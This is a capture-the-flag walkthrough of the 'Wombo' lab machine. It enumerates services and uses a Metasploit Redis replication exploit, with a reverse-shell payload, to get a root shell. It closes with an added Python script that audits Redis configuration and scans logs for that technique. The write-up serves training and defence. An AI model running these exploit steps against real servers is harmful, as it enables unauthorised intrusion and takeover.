# PG - Wombo Walkthrough

## TL;DR

- Exploit Redis to get RCE
## Enumeration

### Port Scan
Start with Nmap to find out which services are running on the target machine.
```
$ nmap -sVC -T4 -v -p- -oN nmapFull.txt $ip
Nmap scan report for 192.168.212.69
Host is up (0.24s latency).
Not shown: 65529 filtered ports
PORT      STATE  SERVICE    VERSION
22/tcp    open   ssh        OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
|   2048 09:80:39:ef:3f:61:a8:d9:e6:fb:04:94:23:c9:ef:a8 (RSA)
|   256 83:f8:6f:50:7a:62:05:aa:15:44:10:f5:4a:c2:f5:a6 (ECDSA)
|_  256 1e:2b:13:30:5c:f1:31:15:b4:e8:f3:d2:c4:e8:05:b5 (ED25519)
53/tcp    closed domain
80/tcp    open   http       nginx 1.10.3
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3
|_http-title: Welcome to nginx!
6379/tcp  open   redis      Redis key-value store 5.0.9
8080/tcp  open   http-proxy
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 3 disallowed entries
|_/admin/ /reset/ /compose
|_http-title: Home | NodeBB
27017/tcp open   mongodb    MongoDB 4.0.18
```
### Searchsploit

From the scan we notice a Redis service (v5.0.9) running on the target system. A quick searchsploit query shows whether that particular version of Redis has any known vulnerability.
```
$ searchsploit redis 5
--------------------------------------------------- ---------------------------------
 Exploit Title                                     |  Path
--------------------------------------------------- ---------------------------------
Microsoft Windows 10 - Diagnostics Hub Standard Co | windows/local/45244.txt
Redis 4.x / 5.x - Unauthenticated Code Execution ( | linux/remote/47195.rb
Redis 5.0 - Denial of Service                      | linux/dos/44908.txt
Redis-cli < 5.0 - Buffer Overflow (PoC)            | linux/local/44904.py
--------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
## Exploitation

### Using Metasploit

Use the module `linux/redis/redis_replication_cmd_exec` and set the options as follows.
```
$ msfconsole
...
msf5 > use linux/redis/redis_replication_cmd_exec
msf5 exploit(linux/redis/redis_replication_cmd_exec) > show options

Module options (exploit/linux/redis/redis_replication_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CUSTOM    true             yes       Whether compile payload file during exploiting
   PASSWORD  foobared         no        Redis password for authentication test
   RHOSTS    192.168.212.69   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     6379             yes       The target port (TCP)
   SRVHOST   192.168.83.129   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   6379             yes       The local port to listen on.

Payload options (linux/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.83.129   yes       The listen address (an interface may be specified)
   LPORT  8080             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
```
`LPORT` is set to 8080 so that the reverse connection doesn't get blocked by a firewall. After setting the required options, run the exploit and wait for the shell.
```
msf5 exploit(linux/redis/redis_replication_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.83.129:8080
[*] 192.168.212.69:6379 - Compile redis module extension file
[+] 192.168.212.69:6379 - Payload generated successfully!
[*] 192.168.212.69:6379 - Listening on 192.168.83.129:6379
[*] 192.168.212.69:6379 - Rogue server close...
[*] 192.168.212.69:6379 - Sending command to trigger payload.
[*] Command shell session 2 opened (192.168.83.129:8080 -> 192.168.212.69:59796) at 2020-04-24 15:19:25 +0800
[!] 192.168.212.69:6379 - This exploit may require manual cleanup of './fkyrakg.so' on the target

whoami
root
cat proof.txt
<Redacted>
```
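The chain above works because the Redis instance is reachable from the network without a password and still accepts `REPLICAOF`/`SLAVEOF` and `MODULE LOAD`, which lets the rogue master push a shared object (the `./fkyrakg.so` the module warns about) and load it. The following Python script is an added example, not part of the original walkthrough or of Metasploit, and shows the two checks a defender would want after reading this: an audit of a `redis.conf`-style text for the settings that leave that path open, and a scan of `redis-server` log lines for the replication and module-load events the technique produces. The sample config texts, the log lines and the module name in them are constructed for this example; the log line shapes are assumed to follow the Redis 5 notice messages `REPLICAOF host:port enabled (user request from '...')` and `Module 'name' loaded from path`.

```python
"""
Defender-side checks for the exposed-Redis condition exploited in the walkthrough.

audit_config(conf_text) -> list of findings for weak settings in a redis.conf-style text
scan_log(log_lines)     -> replication / module-load events found in redis-server log lines

Sample config and log data at the bottom are constructed, not captured from the lab box.
"""
import re
from typing import Dict, List, Sequence

# Commands the rogue-master / module-load chain relies on: REPLICAOF/SLAVEOF points
# the instance at the attacker's server, MODULE loads the pushed .so, CONFIG/DEBUG
# are the usual helpers in related variants. Renaming them to "" disables them.
DANGEROUS_COMMANDS = ("MODULE", "REPLICAOF", "SLAVEOF", "CONFIG", "DEBUG")


def parse_conf(conf_text: str) -> Dict[str, List[List[str]]]:
    """Parse redis.conf lines into {directive: [[args...], ...]}; repeated directives keep every occurrence."""
    directives: Dict[str, List[List[str]]] = {}
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directives.setdefault(parts[0].lower(), []).append(parts[1:])
    return directives


def audit_config(conf_text: str) -> List[str]:
    """Return one finding per weak setting; an empty list means the checked settings are all hardened."""
    d = parse_conf(conf_text)
    findings: List[str] = []

    bind = d.get("bind", [[]])[-1]
    if not bind or any(addr in ("0.0.0.0", "*", "::") for addr in bind):
        findings.append("bind: listens on all interfaces (no 'bind 127.0.0.1')")

    if d.get("protected-mode", [["yes"]])[-1][:1] == ["no"]:
        findings.append("protected-mode: disabled")

    pw = d.get("requirepass", [[]])[-1]
    if not pw or pw[0] in ('""', "''"):
        findings.append("requirepass: no password set (unauthenticated access)")

    # rename-command <CMD> "" is how redis.conf disables a command entirely
    disabled = {a[0].upper() for a in d.get("rename-command", []) if len(a) == 2 and a[1] in ('""', "''")}
    for cmd in DANGEROUS_COMMANDS:
        if cmd not in disabled:
            findings.append(f"rename-command: {cmd} still reachable")
    return findings


# Assumed Redis 5 notice formats (see lead-in); treated as assumptions, not verified against the lab host.
REPLICAOF_RE = re.compile(r"(?:REPLICAOF|SLAVEOF) (?P<host>[^:\s]+):(?P<port>\d+) enabled \(user request")
MODULE_RE = re.compile(r"Module '(?P<name>[^']+)' loaded from (?P<path>\S+)")


def scan_log(log_lines: Sequence[str], allowed_masters: Sequence[str] = ()) -> List[str]:
    """Flag replication to a master not in allowed_masters and every runtime module load."""
    events: List[str] = []
    for line in log_lines:
        m = REPLICAOF_RE.search(line)
        if m and m.group("host") not in allowed_masters:
            events.append(f"replication to unexpected master {m.group('host')}:{m.group('port')}")
        m = MODULE_RE.search(line)
        if m:
            events.append(f"module '{m.group('name')}' loaded from {m.group('path')}")
    return events


# --- constructed sample data -------------------------------------------------
EXPOSED_CONF = """\
# constructed: the kind of config that makes the walkthrough's chain work
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
requirepass <LONG-RANDOM-PASSWORD-PLACEHOLDER>
rename-command MODULE ""
rename-command REPLICAOF ""
rename-command SLAVEOF ""
rename-command CONFIG ""
rename-command DEBUG ""
"""

# Constructed log lines; IPs and the .so path reuse values shown in the walkthrough, module name 'exp' is made up.
SAMPLE_LOG = [
    "1234:M 24 Apr 2020 15:19:20.001 * REPLICAOF 192.168.83.129:6379 enabled (user request from 'id=5 addr=192.168.83.129:40112 cmd=slaveof')",
    "1234:M 24 Apr 2020 15:19:22.340 * MASTER <-> REPLICA sync started",
    "1234:M 24 Apr 2020 15:19:24.870 * Module 'exp' loaded from ./fkyrakg.so",
]

if __name__ == "__main__":
    for label, conf in (("exposed", EXPOSED_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{label}] findings: {audit_config(conf) or 'none'}")
    for event in scan_log(SAMPLE_LOG):
        print(f"[log] {event}")
```

Run it as a script to see the exposed config produce eight findings and the hardened one none, and the constructed log yield one replication event and one module-load event. In a real deployment, pass `allowed_masters` with your legitimate master's address so only unexpected replication targets are reported; a `Module ... loaded` notice on a host that does not use modules is the strongest single indicator of this technique.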